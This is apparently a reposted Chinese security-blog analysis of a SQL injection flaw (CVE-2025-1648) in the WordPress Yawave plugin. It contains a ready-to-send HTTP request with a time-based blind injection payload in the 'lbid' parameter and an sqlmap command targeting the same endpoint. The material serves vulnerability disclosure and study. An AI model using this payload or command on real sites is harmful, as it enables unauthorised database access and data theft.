0x00 前言
/wp-admin/admin-ajax.php?action=js_liveblog_update
0x01 漏洞分析&复现
$get_liveblog_id = sanitize_text_field($_GET['lbid']);
GET /wp-admin/admin-ajax.php?action=js_liveblog_update&lbid=(SELECT%205845%20FROM%20(SELECT(SLEEP(5)))FdfP)
Cache-Control: no-cache
Host: 127.0.0.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
python sqlmap.py -u "http://127.0.0.1/wp-admin/admin-ajax.php?action=js_liveblog_update&lbid=*" --level=3 --dbms=mysql
原文始发于微信公众号(星悦安全):【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论